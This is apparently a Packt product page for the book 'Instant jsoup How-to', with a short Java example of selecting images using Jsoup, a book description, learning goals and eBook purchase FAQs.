In HTML, the images are usually put under the <img> tag, so the selector to query these images is img[src]:

Elements links = doc.select("img[src]");

However, if the image is defined through a CSS property, it is outside the scope of Jsoup, which purely parses the HTML.
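A small sketch on in-memory markup illustrates both points: img[src] picks up image tags that carry a source, while an image referenced only from a style attribute is not found. The markup, the base URI, and the names ImageSketch and imageUrls() are assumptions for the example.

```java
import java.util.ArrayList;
import java.util.List;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;

class ImageSketch {
    // Collects the absolute URL of every <img> that has a src attribute.
    static List<String> imageUrls(String html, String baseUri) {
        Document doc = Jsoup.parse(html, baseUri);
        List<String> urls = new ArrayList<>();
        for (Element img : doc.select("img[src]")) {
            urls.add(img.attr("abs:src"));
        }
        return urls;
    }

    public static void main(String[] args) {
        String html = "<img src=\"/logo.png\">"
                + "<img alt=\"no source\">"
                + "<div style=\"background-image:url(/bg.png)\"></div>";
        // Only the first tag matches; the CSS background is invisible to the selector.
        System.out.println(imageUrls(html, "http://www.example.com/"));
    }
}
```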

Key benefits

  • Learn something new in an Instant! A short, fast, focused guide delivering immediate results
  • Manipulate real-world HTML
  • Discover all the features supported by the Jsoup library
  • Learn how to Extract and Validate HTML data

Description

As you might know, there are a lot of Java libraries that support parsing HTML content out there. Jsoup is yet another HTML parsing library, but it provides a lot of functionalities and boasts much more interesting features when compared to others. Give it a try, and you will see the difference! Instant jsoup How-to provides simple and detailed instructions on how to use the Jsoup library to manipulate HTML content to suit your needs. You will learn the basic aspects of data crawling, as well as the various concepts of Jsoup so you can make the best use of the library to achieve your goals. Instant jsoup How-to will help you learn step-by-step using real-world, practical problems. You will begin by learning several basic topics, such as getting input from a URL, a file, or a string, as well as making use of DOM navigation to search for data. You will then move on to some advanced topics like how to use the CSS selector and how to clean dirty HTML data. HTML data is not always safe, and because of that, you will learn how to sanitize the dirty documents to prevent further XSS attacks. Instant jsoup How-to is a book for every Java developer who wants to learn HTML manipulation quickly and effectively. This book includes the sample source code for you to refer to with a detailed explanation of every feature of the library.

What you will learn

  • Parse HTML from a URL, a file, or a string
  • Find data using DOM or CSS selectors
  • Manipulate the HTML elements, attributes, and text
  • Sanitize data to prevent XSS attacks
  • Understand various methods to configure your library for better results

Table of Contents

7 Chapters
Instant Jsoup How-to
Credits
About the Author
About the Reviewers
www.PacktPub.com
Preface
Instant Jsoup How-to

FAQs

How do I buy and download an eBook?

Where there is an eBook version of a title available, you can buy it from the book details for that title. Add either the standalone eBook or the eBook and print book bundle to your shopping cart. Your eBook will show in your cart as a product on its own. After completing checkout and payment in the normal way, you will receive your receipt on the screen containing a link to a personalised PDF download file. This link will remain active for 30 days. You can download backup copies of the file by logging in to your account at any time.

If you already have Adobe Reader installed, then clicking on the link will download and open the PDF file directly. If you don't, then save the PDF file on your machine and download the Reader to view it.

Please Note: Packt eBooks are non-returnable and non-refundable.

Packt eBook and Licensing

When you buy an eBook from Packt Publishing, completing your purchase means you accept the terms of our licence agreement. Please read the full text of the agreement. In it we have tried to balance the need for the eBook to be usable for you the reader with our needs to protect the rights of us as Publishers and of our authors. In summary, the agreement says:

  • You may make copies of your eBook for your own use onto any machine
  • You may not pass copies of the eBook on to anyone else

How can I make a purchase on your website?

If you want to purchase a video course, eBook, or Bundle (Print+eBook), please follow the steps below:

  1. Register on our website using your email address and a password.
  2. Search for the title by name or ISBN using the search option.
  3. Select the title you want to purchase.
  4. Choose the format you wish to purchase the title in; if you order the Print Book, you get a free eBook copy of the same title.
  5. Proceed with the checkout process (payment to be made using Credit Card, Debit Card, or PayPal).

Where can I access support around an eBook?

  • If you experience a problem with using or installing Adobe Reader, then contact Adobe directly.
  • To view the errata for the book, see www.packtpub.com/support and view the pages for the title you have.
  • To view your account details or to download a new copy of the book go to www.packtpub.com/account
  • To contact us directly if a problem is not resolved, use www.packtpub.com/contact-us

What eBook formats do Packt support?

Our eBooks are currently available in a variety of formats such as PDF and ePub. In the future, this may well change with trends and development in technology, but please note that our PDFs are not Adobe eBook Reader format, which has greater restrictions on security.

You will need to use Adobe Reader v9 or later in order to read Packt's PDF eBooks.

What are the benefits of eBooks?

  • You can get the information you need immediately
  • You can easily take them with you on a laptop
  • You can download them an unlimited number of times
  • You can print them out
  • They are copy-paste enabled
  • They are searchable
  • There is no password protection
  • They are priced lower than print
  • They save resources and space

What is an eBook?

Packt eBooks are a complete electronic version of the print edition, available in PDF and ePub formats. Every piece of content down to the page numbering is the same. Because we save the costs of printing and shipping the book to you, we are able to offer eBooks at a lower cost than print editions.

When you have purchased an eBook, simply log in to your account and click on the link in Your Download Area. We recommend saving the file to your hard drive before opening it.

For optimal viewing of our eBooks, we recommend you download and install the free Adobe Reader version 9.